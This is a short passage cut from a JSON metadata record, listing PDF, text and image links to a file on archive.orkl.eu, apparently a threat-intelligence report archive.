		"pdf": "https://archive.orkl.eu/ff623f88a26afa5d118a0d0724b6cedd683bdee8.pdf",
		"text": "https://archive.orkl.eu/ff623f88a26afa5d118a0d0724b6cedd683bdee8.txt",
		"img": "https://archive.orkl.eu/ff623f88a26afa5d118a0d0724b6cedd683bdee8.jpg"
	}
}